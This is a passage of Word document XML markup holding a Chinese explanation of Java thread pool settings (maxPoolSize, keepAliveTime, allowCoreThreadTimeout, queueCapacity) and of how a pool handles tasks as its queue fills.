          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时会超时退出，默认情况下不会退出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>maxPoolSize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00E9087E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当线程数大于或等于核心线程，且任务队列已满时，线程池会创建新的线程，直到线程数量达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>maxPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。如果线程数已等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>maxPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，且任务队列已满，则已超出线程池的处理能力，线程池会拒绝处理任务而抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>keepAliveTime</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当线程空闲时间达到</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>keepAliveTime</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，该线程会退出，直到线程数量等于</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>corePoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>allowCoreThreadTimeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，则所有线程均会退出直到线程数量为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>allowCoreThreadTimeout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>是否允许核心线程空闲退出，默认值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00A35FD3" w:rsidRPr="0039009F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>核心线程在</w:t>
      </w:r>
      <w:r w:rsidR="00A35FD3" w:rsidRPr="0039009F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>allowCoreThreadTimeout</w:t>
      </w:r>
      <w:r w:rsidR="00A35FD3" w:rsidRPr="0039009F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被设置为</w:t>
      </w:r>
      <w:r w:rsidR="00A35FD3" w:rsidRPr="0039009F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="00A35FD3" w:rsidRPr="0039009F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时会超时退出</w:t>
      </w:r>
      <w:r w:rsidR="00A35FD3" w:rsidRPr="0039009F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00A35FD3" w:rsidRPr="0039009F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>默认情况下不会退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>queueCapacity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>任务队列容量。从</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>maxPoolSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的描述上可以看出，任务队列的容量会影响到线程的变化，因此任务队列的长度也需要恰当的设置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>线程池按以下行为执行任务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当线程数小于核心线程数时，创建线程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当线程数大于等于核心线程数，且任务队列未满时，将任务放入任务队列。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当线程数大于等于核心线程数，且</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>任务队列已满</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>若线程数小于最大线程数，创建线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="003A06A5" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>若线程数等于最大线程数，抛出异常，拒绝任务</w:t>
      </w:r>
      <w:r w:rsidRPr="003A06A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统负载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00B51D31">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数的设置跟系统的负载有直接的关系，下面为系统负载的相关参数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，每秒需要处理的最大任务数量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B51D31" w:rsidRPr="00B51D31" w:rsidRDefault="00B51D31" w:rsidP="00F34CF0">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="390" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B51D31">
        <w:rPr>
